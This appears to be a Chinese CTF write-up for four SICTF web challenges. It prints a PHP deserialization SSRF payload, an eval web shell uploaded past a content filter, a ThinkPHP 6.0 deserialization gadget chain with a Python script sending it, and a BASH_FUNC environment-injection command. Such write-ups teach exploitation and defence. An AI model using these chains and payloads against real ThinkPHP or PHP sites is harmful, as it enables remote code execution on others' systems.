sictf-web-wp

最新推荐文章于 2024-06-19 18:06:31 发布
最新推荐文章于 2024-06-19 18:06:31 发布
阅读量383 收藏 9
点赞数 10
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73255659/article/details/136464676
版权

EZ_SSRF

直接进 一眼反序列化
但是 url设置成为127.0.0.1/flag 无法读取
提示 隐藏了其他文件 扫描目录 那我们就可以看看他有什么文件 目录扫描看到admin.php
进去admin.php

<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
$allowed_ip = "127.0.0.1";
if ($_SERVER['REMOTE_ADDR'] !== $allowed_ip) {
   die("You can't get flag");
} else {
   echo $flag;
}
?>

直接利用首页的反序列化和ssrf 访问admin.php
可以构造

<?php
class client{
    public $url ='http://127.0.0.1/admin.php';
    public $payload ="system(\"cat /flag\");";
   
}
$a=new client();
echo serialize($a);
?>

100_upload

直接看路由 直接就是一个文件包含 直接
php://filter/read=convert.base64-encode/resource=upload.php
读取源码

if (!preg_match("/ph.|htaccess/i", $ext)){

			if(preg_match("/<\?php/i", $text)){
				echo "茂夫说:你的文件内容不太对劲哦<br>";
			}
			else{
				move_uploaded_file($_FILES['upfile']['tmp_name'],$uploadfile);
				echo "上传成功<br>路径为:" . $uploadfile . "<br>";
			}
		} 
		else {
			echo "恶意后缀哦<br>";
			
		}

可以看到我们其实不用考虑文件的后缀名直接看过滤的文件内容即可
不能有 <?php
直接构造

<?
    eval($_POST['x']);
?>

后缀写成txt都行上传后 利用文件包含 解析 连接

Oyst3rPHP

目录扫描得到 www.zip 源码

	  public function index()
    {
		echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";
        echo "<img src='../Oyster.png'"."/>";
		
        
		$payload = base64_decode(@$_POST['payload']);
        $right = @$_GET['left'];
        $left = @$_GET['right'];
        
		$key = (string)@$_POST['key'];
        if($right !== $left && md5($right) == md5($left)){
            
			echo "Congratulations on getting your first oyster";
			echo "<img src='../Oyster1.png'"."/>";
            
			if(preg_match('/.+?THINKPHP/is', $key)){
                die("Oysters don't want you to eat");
            }
            if(stripos($key, '603THINKPHP') === false){
                die("!!!Oysters don't want you to eat!!!");
            }
			
			echo "WOW!!!Congratulations on getting your second oyster";
			echo "<img src='../Oyster2.png'"."/>";
            
			@unserialize($payload);
			//最后一个生蚝在根目录,而且里面有Flag???咋样去找到它呢???它的名字是什么???
			//在源码的某处注释给出了提示,这就看你是不是真懂Oyst3rphp框架咯!!!
			//小Tips:细狗函数┗|`O′|┛ 嗷~~
        }
    }

可以看到 是thinkphp6.0 并且设置了一个md5
弱比较绕过 直接s878926199a s155964671a 两个值可以绕过
之后就是preg_match的绕过 可以使用回溯绕过
最后 @unserialize($payload); 可以根据提示 找到 thinkphp6.0 存在反序列化漏洞
找到exp 可以直接rce
这里给出官方wp的相关反序列化代码

<?php
namespace think\model\concern;
trait Attribute
{
private $data = ["key"=>"cat /Oyst3333333r.php"];
private $withAttr = ["key"=>"system"];
}
namespace think;
abstract class Model
{
use model\concern\Attribute;
private $lazySave = true;
protected $withEvent = false;
private $exists = true;
private $force = true;
protected $name;
public function __construct($obj=""){
$this->name=$obj;
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{}
$a=new Pivot();
$b=new Pivot($a);
echo urlencode(base64_encode(serialize($b));

注意代码的:

private $data = ["key"=>"cat /Oyst3333333r.php"];
private $withAttr = ["key"=>"system"];

由于要 回溯 写一段python脚本

# @description: sictf的一次利用thinkphp6 的反序列化漏洞
# @time:2024/2/28
# @author:K1t0

from requests import *
url="url和端口?left=s878926199a&right=s155964671a"

data={"key":"A"*1000000+"603THINKPHP","payload":"TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjc6e3M6MjE6IgB0aGlua1xNb2R\
lbABsYXp5U2F2ZSI7YjoxO3M6MTI6IgAqAHdpdGhFdmVudCI7YjowO3M6MTk6IgB0aGlua1xNb2RlbA\
BleGlzdHMiO2I6MTtzOjE4OiIAdGhpbmtcTW9kZWwAZm9yY2UiO2I6MTtzOjc6IgAqAG5hbWUiO086M\
Tc6InRoaW5rXG1vZGVsXFBpdm90Ijo3OntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtz\
OjEyOiIAKgB3aXRoRXZlbnQiO2I6MDtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxODo\
iAHRoaW5rXE1vZGVsAGZvcmNlIjtiOjE7czo3OiIAKgBuYW1lIjtzOjA6IiI7czoxNzoiAHRoaW5rXE\
1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6M\
jE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319czox\
NzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzN\
yLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319"}
#res=session.request("post",url,params=params,data=data,headers=headers)  也可以用session的会话来发包
res=post(url,data)
print(res.text)

Not just unserialize

题目描述:
看似平平无奇的反序列化题,出题人却在dockerfile里添加了这样一行奇怪命令:RUN ln -sf /bin/bash /bin/sh……
RUN ln -sf /bin/bash /bin/sh…… 解释:

这条命令是在Linux系统中创建一个名为sh的软链接,指向/bin/bash。通过这个命令,将/bin/sh链接到/bin/bash上,就相当于将系统中默认的Shell解释器从原本的/bin/sh改为了/bin/bash。

题目代码:

<?php

highlight_file(__FILE__);
class start
{
    public $welcome;
    public $you;
    public function __destruct()
    {
        $this->begin0fweb();
    }
    public  function begin0fweb()
    {
        $p='hacker!';
        $this->welcome->you = $p;
    }
}

class SE{
    public $year;
    public function __set($name, $value){
        echo '  Welcome to new year!  ';
        echo($this->year);
    }
}

class CR {
    public $last;
    public $newyear;

    public function __tostring() {

        if (is_array($this->newyear)) {
            echo 'nonono';
            return false;
        }
        if (!preg_match('/worries/i',$this->newyear))
        {
            echo "empty it!";
            return 0;
        }

        if(preg_match('/^.*(worries).*$/',$this->newyear)) {
            echo 'Don\'t be worry';
        } else {
            echo 'Worries doesn\'t exists in the new year  ';
            empty($this->last->worries);
        }
        return false;
    }
}

class ET{

    public function __isset($name)
    {
        foreach ($_GET['get'] as $inject => $rce){
            putenv("{$inject}={$rce}");
        }
        system("echo \"Haven't you get the secret?\"");
    }
}
if(isset($_REQUEST['go'])){
    unserialize(base64_decode($_REQUEST['go']));
}
?>

pop 链很好看出来就是从上到下 直接序列化 好戏在后面
唯一要注意的是:

       if (is_array($this->newyear)) {
            echo 'nonono';
            return false;
        }
        if (!preg_match('/worries/i',$this->newyear))
        {
            echo "empty it!";
            return 0;
        }
		
		if(preg_match('/^.*(worries).*$/',$this->newyear)) {
            echo 'Don\'t be worry';
        } else {
            echo 'Worries doesn\'t exists in the new year  ';
            empty($this->last->worries);
        }

这里有个preg_match的绕过 两个方法

  1. $this->newyear=\nworries
  2. $this->newyear=Worries 哈哈这个应该再限制一个i的不区分大小写

最后最重要的来了

    {
        foreach ($_GET['get'] as $inject => $rce){
            putenv("{$inject}={$rce}");
        }
        system("echo \"Haven't you get the secret?\"");
    }

最后一段 其实是利用了 一个 环境变量 的注入,最后执行命令
主要是因为 变量设置之后 再执行 bash -c "echo hello"我们可以替换 echo命令的函数
从而执行我们想要的命令
大致就是这个流程env $‘BASH_FUNC_echo%%=() { id; }’ bash -c ‘echo hello’
因此首先构造

<?php
class start
{
    public $welcome;
    public $you;

}

class SE{
    public $year;

}

class CR {
    public $last;
    public $newyear;


}

class ET{

}
$a=new start();
$a->welcome=new SE();
$a->welcome->year=new CR();
$a->welcome->year->newyear='Worries';
$a->welcome->year->last=new ET();

$b=base64_encode(serialize($a));
echo($b);
?>

得到:
Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo3OiJXb3JyaWVzIjt9fXM6MzoieW91IjtOO30=
最后直接发包
地址端口/?go= Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo3OiJXb3JyaWVzIjt9fXM6MzoieW91IjtOO30=&get[BASH_FUNC_echo%%]=() { cat /f*; }

K1t0
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
wp-script-core
09-07
wp-script-core wp-script-core wp的一个插件 喜欢的可以下载
wp-statistics
06-01
WORDPRESS Statistics 文件 解压可用 可以直接解压,然后上传到chrome 插件库,
wp-china-yes插件
12-03
WP-China-Yes插件, 解决国内访问官网慢的有效方法
web-wp-API
02-21
Adonis API应用程序 这是在AdonisJs中创建API服务器的样板,它已预先配置。 人体分析仪 验证 CORS 清醒的ORM 迁移与种子 设置 使用adonis命令安装蓝图 adonis new yardstick --api-only 或手动克隆存储库,然后...
wp-rocket-2.10.10
12-09
全球知名的wordpress优化提速插件,这是最新版的,上传安装启用即可。
MVC 框架安全
A526847的博客
06-17 560
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
安全】Linux Fanotify使用入门
最新发布
追寻梦想的青春
06-19 458
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
智慧守护 畅游无忧——北斗应急呼叫柱,为景区安全加码
广州磐钴智能的博客
06-13 1077
智能部署,全面覆盖。
Java应用中文件上传安全性分析与安全实践
喔的嘛呀的博客
06-12 1138
这些措施涵盖了文件路径、文件权限、目录结构、Web服务器配置等多个方面,为开发人员提供了一套全面的指南,以确保文件上传功能不仅方便实用,而且具备较高的安全性。在现代Web应用程序中,数据上传是一个普遍存在的需求,然而,随之而来的是对上传数据安全性的担忧。通过检查文件的扩展名或使用浏览器提供的API验证文件的类型,可以在文件上传之前排除不安全的文件。在Web服务器的配置中,确保上传目录是禁止目录浏览的。客户端与服务端的数据验证是确保上传数据安全性的重要步骤,可以通过一系列验证手段来防范潜在的安全威胁。
springboot优雅shutdown时异步线程安全优化
IT三明治的专栏
06-16 1064
因为前两篇文章介绍的graceful shutdown并不是最优解。从架构师的角度考虑的话,写代码尽量满足多数情况可用,易用,最好还是全局有效的,让其他程序员专注于写业务代码。所以我重新写了一篇
边坡监测规范:确保边坡工程安全稳定的专业准则
yousino1的博客
06-13 482
在边坡工程中实施有效的监测措施,遵循专业的监测规范,能够及时发现边坡存在的安全隐患,为边坡的治理和加固提供科学依据。边坡监测是通过一系列技术手段,对边坡的变形、位移、裂缝、渗流等参数进行实时、连续的观测和记录,以评估边坡的稳定性和变形趋势。因此,在边坡工程中实施有效的监测措施,遵循一系列专业的监测规范,对于预防边坡失稳、滑坡等灾害的发生,保障人民群众的生命财产安全具有重要意义。实时性原则:边坡监测应实时、连续地进行,以便及时发现边坡的变形和位移情况,为边坡治理提供及时、准确的依据。二、边坡监测的基本原则。
第九站:Java黑——安全编码的坚固防线(第②篇)
hummhumm的专栏
06-16 1024
Spring Security是一个强大的安全框架,用于处理认证(验证用户身份)和授权(控制用户访问资源的权限)。Apache Shiro是一个强大且易用的安全框架,它简化了身份验证、授权、会话管理和加密等功能的实现。通过这些额外的示例,我们可以看到,从数据验证、框架集成到网络通信安全,Java应用的每个层面都需要细心考虑和配置,以构建一个全面安全的应用环境。这些示例涵盖了从并发编程、异步处理到构建RESTful服务的多个方面,展示了Java在实际开发中的灵活性和强大功能。首先,你需要一个SSL证书。
上海晋名室外危废品暂存柜助力储能电站行业危废品安全储存
SAVEST的博客
06-13 503
4月中旬用户技术总工在寻找解决方案的过程中搜索到上海晋名的室外暂存柜系列后挺感兴趣的,联系到销售部冯经理,双方进行了高效愉快的沟通。冯经理把收集到的用户需求信息提供给设计部门,设计部收到用户需求后第一时间进行方案图纸设计,用户收到方案后提交公司内部沟通讨论。物流部立即联系专车将室外危废暂存柜安全运送到用户现场,安装团队第一时间赶往用户现场进行安装调试,客户验收合格后顺利交付!近日又有一台SAVEST室外危废暂存柜项目成功验收交付使用,此次项目主要用于储能电站行业废油、废锂电池等危废品的安全储存。
MySQL备份与恢复:确保数据的安全与可靠性
哎 你看的博客
06-13 1146
引言: MySQL备份方法: 物理备份:介绍物理备份的概念,优点和缺点,及常用的物理备份工具(如MySQL Enterprise Backup,XtraBackup等) 逻辑备份:介绍逻辑备份的概念,优点和缺点,及常用的逻辑备份工具(如mysqldump,mysqlpump等) 增量备份与全量备份:介绍增量备份和全量备份的概念,优点和缺点,及如何选择备份方式 MySQL恢复方法: 从物理备份恢复:介绍如何从物理备份文件恢复数据 从逻辑备份恢复:介绍如何从逻辑备份文件恢复数据
警务反诈RPA的用途:提高反诈骗工作效率,保护公众财产安全
weixin_58820787的博客
06-12 529
在未来,金智维也将不断攻坚前沿安全科技,打造更成熟的RPA数字员工体系,以科技手段赋能基层社会治理治安工作,助力反诈工作更高效。
红队攻防渗透技术实战流程:组件安全:Jackson&FastJson&XStream
HACKONE的博客
06-15 161
阿里巴巴公司开源的json解析器,它可以解析JSON格式的字符串,支持将JavaBean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。利用POC:https://github.com/kezibei/fastjson_payload。历史漏洞:https://avd.aliyun.com/search?q=fastjson。历史漏洞:https://avd.aliyun.com/search?历史漏洞:https://avd.aliyun.com/search?
(二)Kafka 安全之使用 SSL 的加密和身份验证
流华追梦的专栏
06-19 497
接上一篇《(一)Kafka 安全之使用 SSL 的加密和身份验证》,本文从 2.2 小节开始。
制作安全科普馆设计方案时,哪些安全细节不容忽视?
qq_2129354861的博客
06-12 336
在数字多媒体技术的浪潮下,创新的展示方式不仅引领了展厅设计的革新,还为知识内容的传递带来了前所未有的高效与便捷。不同类型的多媒体互动装置,让展厅的展示形式变得多样,我们为了确保展示内容更加明确和有条理,就需要对内容展示区域进行划分,而根据不同的安全主题,便是安全教育馆常用的方式之一,例如按照交通安全、消防安全、网络安全等类型的分类,可以将展示区域划分为不同的主题区域,再针对不同的内容版块,来选用适合的多媒体互动装置,使观众能够更快速地找到自己感兴趣的内容。
深信服终端安全管理系统EDR版本升级过程
m0_64423407的博客
06-19 173
深信服终端安全管理系统EDR版本升级统一端点安全管理系统aES
wp-rest-api jwt
09-13
WP-REST-API JWT整合了WordPress的REST API和JWT的认证机制,使得在使用WP-REST-API进行开发的过程中,可以增加身份验证和授权的功能。它允许开发人员在请求WordPress REST API时,通过在请求头或参数中提供有效的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值